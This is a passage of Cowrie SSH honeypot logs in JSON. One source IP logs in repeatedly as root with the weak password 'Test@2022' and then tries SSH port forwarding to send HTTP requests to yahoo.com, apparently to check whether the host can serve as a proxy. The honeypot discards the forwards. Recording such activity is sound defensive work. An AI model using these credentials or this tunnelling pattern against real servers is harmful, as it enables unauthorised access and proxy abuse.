{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.017547Z","src_ip":"213.209.150.239","session":"c7e21e8637bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":20134,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20134","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.153576Z","session":"c7e21e8637bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.200939Z","src_ip":"213.209.150.239","session":"c7e21e8637bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.248838Z","src_ip":"213.209.150.239","session":"c7e21e8637bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41935,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a54ef36e043","protocol":"ssh","message":"New connection: 213.209.150.239:41935 (1.2.3.4:22) [session: 4a54ef36e043]","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.295296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.295986Z","src_ip":"213.209.150.239","session":"4a54ef36e043"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.343166Z","src_ip":"213.209.150.239","session":"4a54ef36e043"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.578269Z","src_ip":"213.209.150.239","session":"4a54ef36e043"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":13948,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13948","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.626391Z","session":"4a54ef36e043"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.673824Z","src_ip":"213.209.150.239","session":"4a54ef36e043"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30124,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30124","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.809559Z","session":"4a54ef36e043"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.857768Z","src_ip":"213.209.150.239","session":"4a54ef36e043"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.905765Z","src_ip":"213.209.150.239","session":"4a54ef36e043"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41991,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b2b7a5943aa","protocol":"ssh","message":"New connection: 213.209.150.239:41991 (1.2.3.4:22) [session: 9b2b7a5943aa]","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.961417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:28.962306Z","src_ip":"213.209.150.239","session":"9b2b7a5943aa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.018862Z","src_ip":"213.209.150.239","session":"9b2b7a5943aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.301600Z","src_ip":"213.209.150.239","session":"9b2b7a5943aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29866,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29866","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.359425Z","session":"9b2b7a5943aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.418079Z","src_ip":"213.209.150.239","session":"9b2b7a5943aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":4327,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4327","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.575122Z","session":"9b2b7a5943aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.631833Z","src_ip":"213.209.150.239","session":"9b2b7a5943aa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.689349Z","src_ip":"213.209.150.239","session":"9b2b7a5943aa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42048,"dst_ip":"1.2.3.4","dst_port":22,"session":"96cb095d479c","protocol":"ssh","message":"New connection: 213.209.150.239:42048 (1.2.3.4:22) [session: 96cb095d479c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.744931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.745662Z","src_ip":"213.209.150.239","session":"96cb095d479c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:29.802430Z","src_ip":"213.209.150.239","session":"96cb095d479c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.085609Z","src_ip":"213.209.150.239","session":"96cb095d479c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":28492,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28492","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.143199Z","session":"96cb095d479c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.199886Z","src_ip":"213.209.150.239","session":"96cb095d479c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":14242,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14242","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.355041Z","session":"96cb095d479c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.411763Z","src_ip":"213.209.150.239","session":"96cb095d479c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.469206Z","src_ip":"213.209.150.239","session":"96cb095d479c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42122,"dst_ip":"1.2.3.4","dst_port":22,"session":"91a532535c9f","protocol":"ssh","message":"New connection: 213.209.150.239:42122 (1.2.3.4:22) [session: 91a532535c9f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.525128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.525889Z","src_ip":"213.209.150.239","session":"91a532535c9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.582865Z","src_ip":"213.209.150.239","session":"91a532535c9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.865384Z","src_ip":"213.209.150.239","session":"91a532535c9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10278,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10278","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.922927Z","session":"91a532535c9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:30.979648Z","src_ip":"213.209.150.239","session":"91a532535c9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10974,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10974","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.135233Z","session":"91a532535c9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.191984Z","src_ip":"213.209.150.239","session":"91a532535c9f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.249497Z","src_ip":"213.209.150.239","session":"91a532535c9f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42176,"dst_ip":"1.2.3.4","dst_port":22,"session":"52a6b0302a3a","protocol":"ssh","message":"New connection: 213.209.150.239:42176 (1.2.3.4:22) [session: 52a6b0302a3a]","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.295662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.296317Z","src_ip":"213.209.150.239","session":"52a6b0302a3a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.343514Z","src_ip":"213.209.150.239","session":"52a6b0302a3a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.578032Z","src_ip":"213.209.150.239","session":"52a6b0302a3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8804,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8804","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.625969Z","session":"52a6b0302a3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.673272Z","src_ip":"213.209.150.239","session":"52a6b0302a3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4678,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4678","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.809442Z","session":"52a6b0302a3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.857116Z","src_ip":"213.209.150.239","session":"52a6b0302a3a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.904879Z","src_ip":"213.209.150.239","session":"52a6b0302a3a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42346,"dst_ip":"1.2.3.4","dst_port":22,"session":"abb47ce6f47f","protocol":"ssh","message":"New connection: 213.209.150.239:42346 (1.2.3.4:22) [session: abb47ce6f47f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.960540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:31.961573Z","src_ip":"213.209.150.239","session":"abb47ce6f47f"}
